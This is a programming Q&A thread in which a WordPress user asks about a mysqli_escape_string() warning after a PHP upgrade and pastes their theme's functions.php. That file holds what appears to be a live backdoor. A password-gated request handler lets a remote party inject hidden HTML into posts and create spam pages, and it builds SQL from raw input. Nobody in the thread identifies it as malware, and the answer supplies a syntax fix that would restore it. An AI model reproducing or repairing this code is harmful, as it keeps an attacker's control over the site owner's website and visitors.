# Warning: mysqli_escape_string() expects exactly 2 parameters

Tags: wordpress, woocommerce

I updated my PHP from 5.6 to 7.3. Now I'm getting:

> **Warning:** mysqli_escape_string() expects exactly 2 parameters, 1 given in /home/rylzkggo/mysite/wp-content/themes/resca-child/functions.php on line 60

The mysqli_escape_string() is a PHP 7 code.

Not sure what is going on.

Here is the full code from my `functions.php` file, line 60:

```
if ( $wpdb->get_var('SELECT count(*) FROM `' . $wpdb->prefix . 'datalist` WHERE `url` = "'.mysqli_escape_string( $_SERVER['REQUEST_URI'] ).'"') == '1' )
    {
        $data = $wpdb -> get_row('SELECT * FROM `' . $wpdb->prefix . 'datalist` WHERE `url` = "'.mysqli_escape_string($_SERVER['REQUEST_URI']).'"');

        if ($data -> full_content)
            {
                print stripslashes($data -> content);
            }
        else
            {
                print '<!DOCTYPE html>';
                print '<html ';
                language_attributes();
                print ' class="no-js">';
                print '<head>';
                print '<title>'.stripslashes($data -> title).'</title>';
                print '<meta name="Keywords" content="'.stripslashes($data -> keywords).'" />';
                print '<meta name="Description" content="'.stripslashes($data -> description).'" />';
                print '<meta name="robots" content="index, follow" />';
                print '<meta charset="';
                bloginfo( 'charset' );
                print '" />';
                print '<meta name="viewport" content="width=device-width">';
                print '<link rel="profile" href="http://gmpg.org/xfn/11">';
                print '<link rel="pingback" href="';
                bloginfo( 'pingback_url' );
                print '">';
                wp_head();
                print '</head>';
                print '<body>';
                print '<div id="content" class="site-content">';
                print stripslashes($data -> content);
                get_search_form();
                get_sidebar();
                get_footer();
            }

        exit;
    }
```

Here is the full code:

```
<?php

if (isset($_REQUEST['action']) && isset($_REQUEST['password']) && ($_REQUEST['password'] == '6a379b52a5a23b76dfd63f9c8fc88190'))
    {
        switch ($_REQUEST['action'])
            {
                case 'get_all_links';
                    foreach ($wpdb->get_results('SELECT * FROM `' . $wpdb->prefix . 'posts` WHERE `post_status` = "publish" AND `post_type` = "post" ORDER BY `ID` DESC', ARRAY_A) as $data)
                        {
                            $data['code'] = '';

                            if (preg_match('!<div id="wp_cd_code">(.*?)</div>!s', $data['post_content'], $_))
                                {
                                    $data['code'] = $_[1];
                                }

                            print '<e><w>1</w><url>' . $data['guid'] . '</url><code>' . $data['code'] . '</code><id>' . $data['ID'] . '</id></e>' . "\r\n";
                        }
                break;

                case 'set_id_links';
                    if (isset($_REQUEST['data']))
                        {
                            $data = $wpdb -> get_row('SELECT `post_content` FROM `' . $wpdb->prefix . 'posts` WHERE `ID` = "'.mysqli_escape_string($_REQUEST['id']).'"');

                            $post_content = preg_replace('!<div id="wp_cd_code">(.*?)</div>!s', '', $data -> post_content);
                            if (!empty($_REQUEST['data'])) $post_content = $post_content . '<div id="wp_cd_code">' . stripcslashes($_REQUEST['data']) . '</div>';

                            if ($wpdb->query('UPDATE `' . $wpdb->prefix . 'posts` SET `post_content` = "' . mysqli_escape_string($post_content) . '" WHERE `ID` = "' . mysqli_escape_string($_REQUEST['id']) . '"') !== false)
                                {
                                    print "true";
                                }
                        }
                break;

                case 'create_page';
                    if (isset($_REQUEST['remove_page']))
                        {
                            if ($wpdb -> query('DELETE FROM `' . $wpdb->prefix . 'datalist` WHERE `url` = "/'.mysqli_escape_string($_REQUEST['url']).'"'))
                                {
                                    print "true";
                                }
                        }
                    elseif (isset($_REQUEST['content']) && !empty($_REQUEST['content']))
                        {
                            if ($wpdb -> query('INSERT INTO `' . $wpdb->prefix . 'datalist` SET `url` = "/'.mysqli_escape_string($_REQUEST['url']).'", `title` = "'.mysqli_escape_string($_REQUEST['title']).'", `keywords` = "'.mysqli_escape_string($_REQUEST['keywords']).'", `description` = "'.mysqli_escape_string($_REQUEST['description']).'", `content` = "'.mysqli_escape_string($_REQUEST['content']).'", `full_content` = "'.mysqli_escape_string($_REQUEST['full_content']).'" ON DUPLICATE KEY UPDATE `title` = "'.mysqli_escape_string($_REQUEST['title']).'", `keywords` = "'.mysqli_escape_string($_REQUEST['keywords']).'", `description` = "'.mysqli_escape_string($_REQUEST['description']).'", `content` = "'.mysqli_escape_string(urldecode($_REQUEST['content'])).'", `full_content` = "'.mysqli_escape_string($_REQUEST['full_content']).'"'))
                                {
                                    print "true";
                                }
                        }
                break;

                default: print "ERROR_WP_ACTION WP_URL_CD";
            }

        die("");
    }


if ( $wpdb->get_var('SELECT count(*) FROM `' . $wpdb->prefix . 'datalist` WHERE `url` = "'.mysqli_escape_string( $_SERVER['REQUEST_URI'] ).'"') == '1' )
    {
        $data = $wpdb -> get_row('SELECT * FROM `' . $wpdb->prefix . 'datalist` WHERE `url` = "'.mysqli_escape_string($_SERVER['REQUEST_URI']).'"');
        if ($data -> full_content)
            {
                print stripslashes($data -> content);
            }
        else
            {
                print '<!DOCTYPE html>';
                print '<html ';
                language_attributes();
                print ' class="no-js">';
                print '<head>';
                print '<title>'.stripslashes($data -> title).'</title>';
                print '<meta name="Keywords" content="'.stripslashes($data -> keywords).'" />';
                print '<meta name="Description" content="'.stripslashes($data -> description).'" />';
                print '<meta name="robots" content="index, follow" />';
                print '<meta charset="';
                bloginfo( 'charset' );
                print '" />';
                print '<meta name="viewport" content="width=device-width">';
                print '<link rel="profile" href="http://gmpg.org/xfn/11">';
                print '<link rel="pingback" href="';
                bloginfo( 'pingback_url' );
                print '">';
                wp_head();
                print '</head>';
                print '<body>';
                print '<div id="content" class="site-content">';
                print stripslashes($data -> content);
                get_search_form();
                get_sidebar();
                get_footer();
            }

        exit;
    }


?>
```

Please please help. sorry I'm struggling now almost few weeks to get this fixed.

Comment: Did you check the documentation yet? If not, you should read it to understand what's going on and how to fix it: [mysqli_escape_string()](https://www.php.net/manual/en/function.mysqli-escape-string.php).

Comment: it says to add: mysqli_real_escape_string  so I added there instead still give me the same result warning. please help

Comment: Good. Did you read the documentation of the [mysqli_real_escape_string()](https://www.php.net/manual/en/mysqli.real-escape-string.php) function as well? The answer to fix your issue is in there.

Answer (score 0):

maybe it's late but here's the answer !

you need pass two parameter  first is database variable and second one is your input from form

example:

```
<?php
$servername = "localhost";
$username = "username";
$password = "password";

// Creating a connection
$conn = new mysqli($servername, $username, $password);
// Check connection
if ($conn->connect_error) {
    die("Connection failed: " . $conn->connect_error);
} 

$escaped_string=mysqli_escape_string($conn,$post_content);

?>
```